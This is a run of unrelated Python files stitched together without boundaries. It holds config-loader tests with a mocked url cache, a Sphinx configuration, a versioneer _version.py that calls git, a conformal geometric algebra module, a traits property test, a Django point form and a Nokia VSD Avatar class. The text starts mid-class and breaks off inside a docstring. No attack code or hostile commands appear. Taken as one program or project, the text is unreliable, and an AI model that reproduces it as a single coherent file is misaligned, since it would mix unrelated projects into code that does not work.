        self.headers = {'last-modified': time()}

    def close(self):
        # Deliberately a no-op so cached content survives repeated use.
        pass


scheme_re = re.compile(r'file:(/+)?')


class MockUrlCache(dict):
    """url -> MockUrlContent table with urlopen()-style lookup rules."""

    def __setitem__(self, name, content):
        # Every stored value is wrapped as mock url content.
        dict.__setitem__(self, name, MockUrlContent(content))

    def __getitem__(self, name):
        if name in self:
            return dict.__getitem__(self, name)
        if name.startswith('file:'):
            # Retry with the 'file:[///]' scheme prefix stripped off.
            bare = scheme_re.sub('', name)
            if bare in self:
                return dict.__getitem__(self, bare)
        # urlopen raises ValueError if unable to load content (not KeyError)
        raise ValueError("{0}: Cannot find file content".format(name))

# Shared url -> content table consulted by the mocked urlopen().
Urls = MockUrlCache()

def clear_configs():
    """Per-test setup hook for nose's with_setup (currently a no-op)."""
    pass

@with_setup(clear_configs)
def testImportContent():
    # NOTE(review): the docstring reads like the message nose shows when the
    # test FAILS; the test itself asserts that importing does work.
    "Cannot import content from a file"
    # A <string> constant with a src attribute should inline the content of
    # the referenced url.
    from xmlconfig import getConfig
    Urls.clear()
    Urls["file:file.txt"] = "Content embedded in a file"
    Urls["config.xml"] = \
    u"""<?xml version="1.0" encoding="utf-8"?>
    <config>
        <constants>
            <string key="import" src="file:file.txt"/>
        </constants>
    </config>
    """
    conf=getConfig()
    conf.load("config.xml")
    assert conf.get("import") == "Content embedded in a file"

@with_setup(clear_configs)
def testImportConfig():
    "Cannot import another config file"
    # A <constants> element with namespace= and src= should load the
    # referenced config under that namespace, making %(import:key22)
    # resolvable from the importing document.
    from xmlconfig import getConfig
    Urls.clear()
    Urls["config2.xml"] = \
    """<?xml version="1.0"?>
    <config>
        <constants>
            <string key="key22">This was imported from config2.xml</string>
        </constants>
    </config>
    """
    Urls["config.xml"] = \
    u"""<?xml version="1.0" encoding="utf-8"?>
    <config>
        <constants namespace="import" src="file:config2.xml"/>
        <constants>
            <string key="imported">%(import:key22)</string>
        </constants>
    </config>
    """
    conf=getConfig()
    conf.load("config.xml")
    assert conf.get("imported") == "This was imported from config2.xml"

@with_setup(clear_configs)
def testCircularImport():
    "Properly detect circular importing"
    # config.xml imports config2.xml, which imports config.xml back; the
    # loader must resolve the cross-references instead of looping forever.
    from xmlconfig import getConfig
    Urls.clear()
    Urls["config2.xml"] = \
    """<?xml version="1.0"?>
    <config>
        <constants namespace="circular" src="file:config.xml"/>        
        <constants>
            <string key="key22">This was imported from config2.xml</string>        
            <string key="foreign">
                Namespace changed in %(circular:key4.import)
            </string>
        </constants>
    </config>
    """
    Urls["config.xml"] = \
    """<?xml version="1.0"?>
    <config>
        <constants namespace="import" src="file:config2.xml"/>
        <constants>
            <section key="key4">
                <string key="key5">value2</string>
                <string key="import">%(import:key22)</string>
            </section>
        </constants>
    </config>
    """
    conf=getConfig()
    conf.load("config.xml")
    assert conf.get("import:foreign") == \
        "Namespace changed in This was imported from config2.xml"

@with_setup(clear_configs)
def testRelativeImport():
    """Transfer leading absolute or relative path to the location of 
    documents imported"""
    # config.xml lives in ../config/; its src="file:config2.xml" must be
    # resolved relative to that directory, i.e. to ../config/config2.xml.
    from xmlconfig import getConfig
    Urls["../config/config2.xml"] = \
    """<?xml version="1.0"?>
    <config>
        <constants>
            <string key="key22">This was imported from config2.xml</string>
        </constants>
    </config>
    """
    Urls["../config/config.xml"] = \
    """<?xml version="1.0" encoding="utf-8"?>
    <config>
        <constants namespace="import" src="file:config2.xml"/>
        <constants>
            <string key="imported">%(import:key22)</string>
        </constants>
    </config>
    """
    conf=getConfig()
    conf.load("../config/config.xml")
    assert conf.get("imported") == "This was imported from config2.xml"
    

# -*- coding: utf-8 -*-
#
# complexity documentation build configuration file, created by
# sphinx-quickstart on Tue Jul  9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys, os

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# Make the package importable from the docs directory so that autodoc and
# the version lookup below can find it.
cwd = os.getcwd()
parent = os.path.dirname(cwd)
sys.path.append(parent)

import organigrammi

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# Sphinx extensions: pull API docs from docstrings and link to highlighted
# source code.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']

# Template locations, source file suffix and the master toctree document.
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'

# Project metadata.
project = u'openpa-organigrammi'
copyright = u'2014, Simone Dalla'

# Short X.Y version and full release string, both taken straight from the
# package so the documentation can never drift from the code.
version = organigrammi.__version__
release = organigrammi.__version__

# Patterns, relative to the source directory, ignored when looking for
# source files.
exclude_patterns = ['_build']

# Pygments (syntax highlighting) style.
pygments_style = 'sphinx'

# Other general options (language, today/today_fmt, default_role,
# add_function_parentheses, add_module_names, show_authors,
# modindex_common_prefix, keep_warnings, ...) keep their Sphinx defaults.


# -- Options for HTML output ----------------------------------------------

# Built-in theme used for HTML and HTML Help pages.
html_theme = 'default'

# Custom static files (such as style sheets); copied after Sphinx's own
# static files, so e.g. a "default.css" here overrides the built-in one.
html_static_path = ['_static']

# Output file base name for the HTML help builder.
htmlhelp_basename = 'openpa-organigrammidoc'

# All other HTML options (html_theme_options, html_theme_path, html_title,
# html_short_title, html_logo, html_favicon, html_last_updated_fmt,
# html_use_smartypants, html_sidebars, html_additional_pages,
# html_domain_indices, html_use_index, html_split_index,
# html_show_sourcelink, html_show_sphinx, html_show_copyright,
# html_use_opensearch, html_file_suffix, ...) keep their Sphinx defaults.


# -- Options for LaTeX output ---------------------------------------------

# Overrides for the LaTeX builder; empty means every option (papersize,
# pointsize, preamble, ...) keeps its default.
latex_elements = {}

# Grouping of the document tree into LaTeX files: one tuple per output,
# (source start file, target name, title, author, documentclass).
latex_documents = [
  ('index', 'openpa-organigrammi.tex', u'openpa-organigrammi Documentation',
   u'Simone Dalla', 'manual'),
]

# latex_logo, latex_use_parts, latex_show_pagerefs, latex_show_urls,
# latex_appendices and latex_domain_indices keep their defaults.


# -- Options for manual page output ---------------------------------------

# One entry per manual page:
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'openpa-organigrammi', u'openpa-organigrammi Documentation',
     [u'Simone Dalla'], 1)
]

# man_show_urls keeps its default (False).


# -- Options for Texinfo output -------------------------------------------

# Grouping of the document tree into Texinfo files: one tuple per output,
# (source start file, target name, title, author, dir menu entry,
#  description, category).
texinfo_documents = [
  ('index', 'openpa-organigrammi', u'openpa-organigrammi Documentation',
   u'Simone Dalla', 'openpa-organigrammi', 'One line description of project.',
   'Miscellaneous'),
]

# texinfo_appendices, texinfo_domain_indices, texinfo_show_urls and
# texinfo_no_detailmenu keep their defaults.

# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.

# This file is released into the public domain. Generated by
# versioneer-0.19 (https://github.com/python-versioneer/python-versioneer)

"""Git implementation of _version.py."""

import errno
import os
import re
import subprocess
import sys


def get_keywords():
    """Get the keywords needed to look up the version information."""
    # The $Format$ placeholders below are expanded by git during
    # `git archive`. setup.py/versioneer.py greps for the variable names,
    # so each one must stay on a line of its own.
    git_refnames = "$Format:%d$"
    git_full = "$Format:%H$"
    git_date = "$Format:%ci$"
    return {"refnames": git_refnames, "full": git_full, "date": git_date}


class VersioneerConfig:
    """Container for Versioneer configuration parameters.

    Attributes (VCS, style, tag_prefix, parentdir_prefix,
    versionfile_source, verbose) are assigned by get_config().
    """


def get_config():
    """Create, populate and return the VersioneerConfig() object."""
    # These values are filled in when 'setup.py versioneer' creates
    # _version.py.
    cfg = VersioneerConfig()
    for attrname, value in [("VCS", "git"),
                            ("style", "pep440"),
                            ("tag_prefix", "v"),
                            ("parentdir_prefix", ""),
                            ("versionfile_source", "jxl2txt/_version.py"),
                            ("verbose", False)]:
        setattr(cfg, attrname, value)
    return cfg


class NotThisMethod(Exception):
    """Exception raised if a method is not valid for the current scenario."""


# Templates for generated _version.py files, keyed by VCS name.
LONG_VERSION_PY = {}
# Nested registry of handler callables: HANDLERS[vcs][method] -> function.
HANDLERS = {}


def register_vcs_handler(vcs, method):  # decorator
    """Create decorator to mark a method as the handler of a VCS."""
    def decorate(f):
        """Store f in HANDLERS[vcs][method]."""
        HANDLERS.setdefault(vcs, {})[method] = f
        return f
    return decorate


def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
                env=None):
    """Call the given command(s).

    Try each candidate name in *commands* in turn until one can be spawned
    with *args*, and return ``(stdout, returncode)`` for it. Returns
    ``(None, None)`` if no candidate could be started at all.
    """
    assert isinstance(commands, list)
    p = None
    for c in commands:
        try:
            dispcmd = str([c] + args)
            # remember shell=False, so use git.cmd on windows, not just git
            p = subprocess.Popen([c] + args, cwd=cwd, env=env,
                                 stdout=subprocess.PIPE,
                                 stderr=(subprocess.PIPE if hide_stderr
                                         else None))
            break
        except EnvironmentError:
            # sys.exc_info() form keeps this file Python-2 compatible.
            e = sys.exc_info()[1]
            if e.errno == errno.ENOENT:
                # This candidate binary doesn't exist; try the next one.
                continue
            if verbose:
                print("unable to run %s" % dispcmd)
                print(e)
            return None, None
    else:
        # for/else: loop finished without `break`, i.e. nothing spawned.
        if verbose:
            print("unable to find command, tried %s" % (commands,))
        return None, None
    stdout = p.communicate()[0].strip().decode()
    if p.returncode != 0:
        if verbose:
            print("unable to run %s (error)" % dispcmd)
            print("stdout was %s" % stdout)
        return None, p.returncode
    return stdout, p.returncode


def versions_from_parentdir(parentdir_prefix, root, verbose):
    """Try to determine the version from the parent directory name.

    Source tarballs conventionally unpack into a directory that includes
    both the project name and a version string. Up to two additional
    directory levels above *root* are searched for an appropriately named
    parent directory. Raises NotThisMethod when nothing matches.
    """
    tried = []
    for _ in range(3):
        leaf = os.path.basename(root)
        if leaf.startswith(parentdir_prefix):
            # Everything after the prefix is the version string.
            return {"version": leaf[len(parentdir_prefix):],
                    "full-revisionid": None,
                    "dirty": False, "error": None, "date": None}
        tried.append(root)
        root = os.path.dirname(root)  # up a level

    if verbose:
        print("Tried directories %s but none started with prefix %s" %
              (str(tried), parentdir_prefix))
    raise NotThisMethod("rootdir doesn't start with parentdir_prefix")


@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
    """Extract version information from the given file.

    Returns a dict with any of "refnames", "full" and "date" found in the
    file; missing or unreadable files yield an empty dict.
    """
    # the code embedded in _version.py can just fetch the value of these
    # keywords. When used from setup.py, we don't want to import _version.py,
    # so we do it with a regexp instead. This function is not used from
    # _version.py.
    keywords = {}
    try:
        # `with` guarantees the handle is closed even if a read raises;
        # the original f = open(...) ... f.close() leaked it on error.
        with open(versionfile_abs, "r") as f:
            for line in f:
                stripped = line.strip()
                if stripped.startswith("git_refnames ="):
                    mo = re.search(r'=\s*"(.*)"', line)
                    if mo:
                        keywords["refnames"] = mo.group(1)
                if stripped.startswith("git_full ="):
                    mo = re.search(r'=\s*"(.*)"', line)
                    if mo:
                        keywords["full"] = mo.group(1)
                if stripped.startswith("git_date ="):
                    mo = re.search(r'=\s*"(.*)"', line)
                    if mo:
                        keywords["date"] = mo.group(1)
    except EnvironmentError:
        # Missing/unreadable file: fall through and return what we have.
        pass
    return keywords


@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
    """Get version information from git keywords.

    `keywords` is the dict produced by git_get_keywords() (keys
    "refnames", "full", optionally "date").  `tag_prefix` is stripped
    from candidate tag names; `verbose` enables progress printing.
    Returns a version dict, or raises NotThisMethod when the keywords
    are missing or were never expanded by git-archive.
    """
    if not keywords:
        raise NotThisMethod("no keywords at all, weird")
    date = keywords.get("date")
    if date is not None:
        # Use only the last line.  Previous lines may contain GPG signature
        # information.
        date = date.splitlines()[-1]

        # git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
        # datestamp. However we prefer "%ci" (which expands to an "ISO-8601
        # -like" string, which we must then edit to make compliant), because
        # it's been around since git-1.5.3, and it's too difficult to
        # discover which version we're using, or to work around using an
        # older one.
        date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
    refnames = keywords["refnames"].strip()
    if refnames.startswith("$Format"):
        # The $Format$ placeholder is still literal: this tree never went
        # through git-archive's keyword substitution.
        if verbose:
            print("keywords are unexpanded, not using")
        raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
    refs = set([r.strip() for r in refnames.strip("()").split(",")])
    # starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
    # just "foo-1.0". If we see a "tag: " prefix, prefer those.
    TAG = "tag: "
    tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
    if not tags:
        # Either we're using git < 1.8.3, or there really are no tags. We use
        # a heuristic: assume all version tags have a digit. The old git %d
        # expansion behaves like git log --decorate=short and strips out the
        # refs/heads/ and refs/tags/ prefixes that would let us distinguish
        # between branches and tags. By ignoring refnames without digits, we
        # filter out many common branch names like "release" and
        # "stabilization", as well as "HEAD" and "master".
        tags = set([r for r in refs if re.search(r'\d', r)])
        if verbose:
            print("discarding '%s', no digits" % ",".join(refs - tags))
    if verbose:
        print("likely tags: %s" % ",".join(sorted(tags)))
    for ref in sorted(tags):
        # sorting will prefer e.g. "2.0" over "2.0rc1"
        if ref.startswith(tag_prefix):
            r = ref[len(tag_prefix):]
            if verbose:
                print("picking %s" % r)
            return {"version": r,
                    "full-revisionid": keywords["full"].strip(),
                    "dirty": False, "error": None,
                    "date": date}
    # no suitable tags, so version is "0+unknown", but full hex is still there
    if verbose:
        print("no suitable tags, using unknown + full revision id")
    return {"version": "0+unknown",
            "full-revisionid": keywords["full"].strip(),
            "dirty": False, "error": "no suitable tags", "date": None}


@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
    """Get version from 'git describe' in the root of the source tree.

    This only gets called if the git-archive 'subst' keywords were *not*
    expanded, and _version.py hasn't already been rewritten with a short
    version string, meaning we're inside a checked out source tree.

    Returns a "pieces" dict with keys "long", "short", "error", "dirty",
    "date", and (when describe output parses) "closest-tag" and
    "distance".  Raises NotThisMethod if `root` is not a git checkout.
    """
    GITS = ["git"]
    if sys.platform == "win32":
        # Try both the .cmd shim and the plain executable on Windows.
        GITS = ["git.cmd", "git.exe"]

    out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
                          hide_stderr=True)
    if rc != 0:
        if verbose:
            print("Directory %s not under git control" % root)
        raise NotThisMethod("'git rev-parse --git-dir' returned error")

    # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
    # if there isn't one, this yields HEX[-dirty] (no NUM)
    describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
                                          "--always", "--long",
                                          "--match", "%s*" % tag_prefix],
                                   cwd=root)
    # --long was added in git-1.5.5
    if describe_out is None:
        raise NotThisMethod("'git describe' failed")
    describe_out = describe_out.strip()
    full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
    if full_out is None:
        raise NotThisMethod("'git rev-parse' failed")
    full_out = full_out.strip()

    pieces = {}
    pieces["long"] = full_out
    pieces["short"] = full_out[:7]  # maybe improved later
    pieces["error"] = None

    # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
    # TAG might have hyphens.
    git_describe = describe_out

    # look for -dirty suffix
    dirty = git_describe.endswith("-dirty")
    pieces["dirty"] = dirty
    if dirty:
        git_describe = git_describe[:git_describe.rindex("-dirty")]

    # now we have TAG-NUM-gHEX or HEX

    if "-" in git_describe:
        # TAG-NUM-gHEX
        mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
        if not mo:
            # unparseable. Maybe git-describe is misbehaving?
            pieces["error"] = ("unable to parse git-describe output: '%s'"
                               % describe_out)
            return pieces

        # tag
        full_tag = mo.group(1)
        if not full_tag.startswith(tag_prefix):
            if verbose:
                fmt = "tag '%s' doesn't start with prefix '%s'"
                print(fmt % (full_tag, tag_prefix))
            pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
                               % (full_tag, tag_prefix))
            return pieces
        pieces["closest-tag"] = full_tag[len(tag_prefix):]

        # distance: number of commits since tag
        pieces["distance"] = int(mo.group(2))

        # commit: short hex revision ID
        pieces["short"] = mo.group(3)

    else:
        # HEX: no tags
        pieces["closest-tag"] = None
        count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
                                    cwd=root)
        pieces["distance"] = int(count_out)  # total number of commits

    # commit date: see ISO-8601 comment in git_versions_from_keywords()
    # NOTE(review): run_command() can return (None, rc) on failure, which
    # would make .strip() raise here -- presumably git-show cannot fail
    # once rev-parse succeeded above; confirm.
    date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
                       cwd=root)[0].strip()
    # Use only the last line.  Previous lines may contain GPG signature
    # information.
    date = date.splitlines()[-1]
    pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)

    return pieces


def plus_or_dot(pieces):
    """Return the next local-version separator for PEP 440 rendering.

    "." when the closest tag already carries a "+" (local segment
    started), otherwise "+".
    """
    tag = pieces.get("closest-tag", "")
    return "." if "+" in tag else "+"


def render_pep440(pieces):
    """Build up version string, with post-release "local version identifier".

    Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
    get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty

    Exceptions:
    1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
    """
    tag = pieces["closest-tag"]
    dirty_suffix = ".dirty" if pieces["dirty"] else ""
    if not tag:
        # exception #1: no tag at all
        return ("0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
                + dirty_suffix)
    if not (pieces["distance"] or pieces["dirty"]):
        # clean build sitting exactly on a tag
        return tag
    local = "%d.g%s" % (pieces["distance"], pieces["short"])
    return tag + plus_or_dot(pieces) + local + dirty_suffix


def render_pep440_pre(pieces):
    """TAG[.post0.devDISTANCE] -- No -dirty.

    Exceptions:
    1: no tags. 0.post0.devDISTANCE
    """
    tag = pieces["closest-tag"]
    distance = pieces["distance"]
    if not tag:
        # exception #1
        return "0.post0.dev%d" % distance
    # commits past the tag become a .post0.devN pre-release marker
    return tag + (".post0.dev%d" % distance if distance else "")


def render_pep440_post(pieces):
    """TAG[.postDISTANCE[.dev0]+gHEX] .

    The ".dev0" means dirty. Note that .dev0 sorts backwards
    (a dirty tree will appear "older" than the corresponding clean one),
    but you shouldn't be releasing software with -dirty anyways.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    tag = pieces["closest-tag"]
    dev_marker = ".dev0" if pieces["dirty"] else ""
    if tag:
        if not (pieces["distance"] or pieces["dirty"]):
            # clean build exactly on the tag
            return tag
        return (tag + ".post%d" % pieces["distance"] + dev_marker
                + plus_or_dot(pieces) + "g%s" % pieces["short"])
    # exception #1: never tagged
    return ("0.post%d" % pieces["distance"] + dev_marker
            + "+g%s" % pieces["short"])


def render_pep440_old(pieces):
    """TAG[.postDISTANCE[.dev0]] .

    The ".dev0" means dirty.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    dev_marker = ".dev0" if pieces["dirty"] else ""
    tag = pieces["closest-tag"]
    if not tag:
        # exception #1
        return "0.post%d" % pieces["distance"] + dev_marker
    if pieces["distance"] or pieces["dirty"]:
        return tag + ".post%d" % pieces["distance"] + dev_marker
    return tag


def render_git_describe(pieces):
    """TAG[-DISTANCE-gHEX][-dirty].

    Like 'git describe --tags --dirty --always'.

    Exceptions:
    1: no tags. HEX[-dirty]  (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    if tag:
        out = tag
        if pieces["distance"]:
            out += "-%d-g%s" % (pieces["distance"], pieces["short"])
    else:
        # exception #1: bare short hash
        out = pieces["short"]
    return out + ("-dirty" if pieces["dirty"] else "")


def render_git_describe_long(pieces):
    """TAG-DISTANCE-gHEX[-dirty].

    Like 'git describe --tags --dirty --always --long'.
    The distance/hash is unconditional.

    Exceptions:
    1: no tags. HEX[-dirty]  (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    if tag:
        out = "%s-%d-g%s" % (tag, pieces["distance"], pieces["short"])
    else:
        # exception #1: bare short hash
        out = pieces["short"]
    return out + ("-dirty" if pieces["dirty"] else "")


def render(pieces, style):
    """Render the given version pieces into the requested style.

    Unknown styles raise ValueError; an upstream error short-circuits
    to an "unknown" version dict carrying that error.
    """
    if pieces["error"]:
        return {"version": "unknown",
                "full-revisionid": pieces.get("long"),
                "dirty": None,
                "error": pieces["error"],
                "date": None}

    if not style or style == "default":
        style = "pep440"  # the default

    # Lambdas defer each renderer's name lookup until a style is chosen.
    renderers = {
        "pep440": lambda: render_pep440(pieces),
        "pep440-pre": lambda: render_pep440_pre(pieces),
        "pep440-post": lambda: render_pep440_post(pieces),
        "pep440-old": lambda: render_pep440_old(pieces),
        "git-describe": lambda: render_git_describe(pieces),
        "git-describe-long": lambda: render_git_describe_long(pieces),
    }
    renderer = renderers.get(style)
    if renderer is None:
        raise ValueError("unknown style '%s'" % style)
    rendered = renderer()

    return {"version": rendered, "full-revisionid": pieces["long"],
            "dirty": pieces["dirty"], "error": None,
            "date": pieces.get("date")}


def get_versions():
    """Get version information or return default if unable to do so.

    Strategy, in order: expanded git-archive keywords, then a live
    'git describe' on the working tree, then the parent-directory name.
    Each method signals "not applicable" by raising NotThisMethod.
    """
    # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
    # __file__, we can work backwards from there to the root. Some
    # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
    # case we can only use expanded keywords.

    cfg = get_config()
    verbose = cfg.verbose

    try:
        return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
                                          verbose)
    except NotThisMethod:
        pass

    try:
        root = os.path.realpath(__file__)
        # versionfile_source is the relative path from the top of the source
        # tree (where the .git directory might live) to this file. Invert
        # this to find the root from __file__.
        for i in cfg.versionfile_source.split('/'):
            root = os.path.dirname(root)
    except NameError:
        # __file__ is undefined on some frozen/embedded interpreters.
        return {"version": "0+unknown", "full-revisionid": None,
                "dirty": None,
                "error": "unable to find root of source tree",
                "date": None}

    try:
        pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
        return render(pieces, cfg.style)
    except NotThisMethod:
        pass

    try:
        if cfg.parentdir_prefix:
            return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
    except NotThisMethod:
        pass

    # Every method failed: report an explicit "unknown" version.
    return {"version": "0+unknown", "full-revisionid": None,
            "dirty": None,
            "error": "unable to compute version", "date": None}

from . import Cl, conformalize
# Build the 3D Euclidean algebra, then extend it to the conformal model.
layout_orig, blades_orig = Cl(3)
layout, blades, stuff = conformalize(layout_orig)


# Inject the blade objects and the conformalize() helper objects into this
# module's namespace so `from <module> import *` exposes them directly.
# NOTE: at module level locals() is the module dict, so update() is
# effective here (it would not be inside a function).
locals().update(blades)
locals().update(stuff)

# for shorter reprs
layout.__name__ = 'layout'
layout.__module__ = __name__

"""
Unit tests to ensure that we can call reset_traits/delete on a
property trait (regression tests for Github issue #67).

"""

from traits import _py2to3
from traits.api import Any, HasTraits, Int, Property, TraitError
from traits.testing.unittest_tools import unittest


class E(HasTraits):
    """Fixture with bare Property traits (no getters/setters defined),
    used by the regression tests for GitHub issue #67."""

    # Untyped property: no _get_a/_set_a, so access uses default behavior.
    a = Property(Any)

    # Int-typed property, likewise without accessors.
    b = Property(Int)


class TestPropertyDelete(unittest.TestCase):
    """Regression tests for GitHub issue #67: deleting or resetting a
    Property trait must be handled gracefully."""

    def test_property_delete(self):
        # Deleting a Property trait is rejected with TraitError.
        e = E()
        with self.assertRaises(TraitError):
            del e.a
        with self.assertRaises(TraitError):
            del e.b

    def test_property_reset_traits(self):
        # reset_traits() must report both properties as un-resettable
        # instead of raising.
        e = E()
        unresetable = e.reset_traits()
        _py2to3.assertCountEqual(self, unresetable, ['a', 'b'])

from django import forms
from ncdjango.interfaces.arcgis.form_fields import SrField


class PointForm(forms.Form):
    """Validates a 2D point plus its spatial reference.

    NOTE(review): SrField presumably parses an ArcGIS spatial-reference
    value -- confirm against ncdjango.interfaces.arcgis.form_fields.
    """
    x = forms.FloatField()
    y = forms.FloatField()
    projection = SrField()
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#     * Redistributions of source code must retain the above copyright
#       notice, this list of conditions and the following disclaimer.
#     * Redistributions in binary form must reproduce the above copyright
#       notice, this list of conditions and the following disclaimer in the
#       documentation and/or other materials provided with the distribution.
#     * Neither the name of the copyright holder nor the names of its contributors
#       may be used to endorse or promote products derived from this software without
#       specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.




from .fetchers import NUPermissionsFetcher


from .fetchers import NUMetadatasFetcher


from .fetchers import NUGlobalMetadatasFetcher

from bambou import NURESTObject


class NUAvatar(NURESTObject):
    """ Represents a Avatar in the VSD

        Notes:
            Avatar
    """

    __rest_name__ = "avatar"
    __resource_name__ = "avatars"

    
    ## Constants
    
    CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
    
    CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
    
    

    def __init__(self, **kwargs):
        """ Initializes a Avatar instance

            Notes:
                You can specify all parameters while calling this methods.
                A special argument named `data` will enable you to load the
                object from a Python dictionary

            Examples:
                >>> avatar = NUAvatar(id=u'xxxx-xxx-xxx-xxx', name=u'Avatar')
                >>> avatar = NUAvatar(data=my_dict)
        """

        super(NUAvatar, self).__init__()

        # Read/Write Attributes
        
        self._last_updated_by = None
        self._last_updated_date = None
        self._embedded_metadata = None
        self._entity_scope = None
        self._creation_date = None
        self._owner = None
        self._external_id = None
        self._type = None
        
        # Map each local attribute to its remote (VSD API JSON) name.
        self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
        self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
        self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
        self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
        self.expose_attribute(local_name="type", remote_name="type", attribute_type=str, is_required=False, is_unique=False)
        

        # Fetchers
        
        
        self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
        
        
        self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
        
        
        self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
        

        # Populate the exposed attributes from **kwargs / `data` (bambou).
        self._compute_args(**kwargs)

    # Properties
    
    @property
    def last_updated_by(self):
        """ Get last_updated_by value.

            Notes:
                ID of the user who last updated the object.

                
                This attribute is named `lastUpdatedBy` in VSD API.
                
        """
        return self._last_updated_by

    @last_updated_by.setter
    def last_updated_by(self, value):
        """ Set last_updated_by value.

            Notes:
                ID of the user who last updated the object.

                
                This attribute is named `lastUpdatedBy` in VSD API.
                
        """
        self._last_updated_by = value

    
    @property
    def last_updated_date(self):
        """ Get last_updated_date value.

            Notes:
                Time stamp when this object was last updated.

                
                This attribute is named `lastUpdatedDate` in VSD API.
                
        """
        return self._last_updated_date

    @last_updated_date.setter
    def last_updated_date(self, value):
        """ Set last_updated_date value.

            Notes:
                Time stamp when this object was last updated.

                
                This attribute is named `lastUpdatedDate` in VSD API.
                
        """
        self._last_updated_date = value

    
    @property
    def embedded_metadata(self):
        """ Get embedded_metadata value.

            Notes:
                Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.

                
                This attribute is named `embeddedMetadata` in VSD API.
                
        """
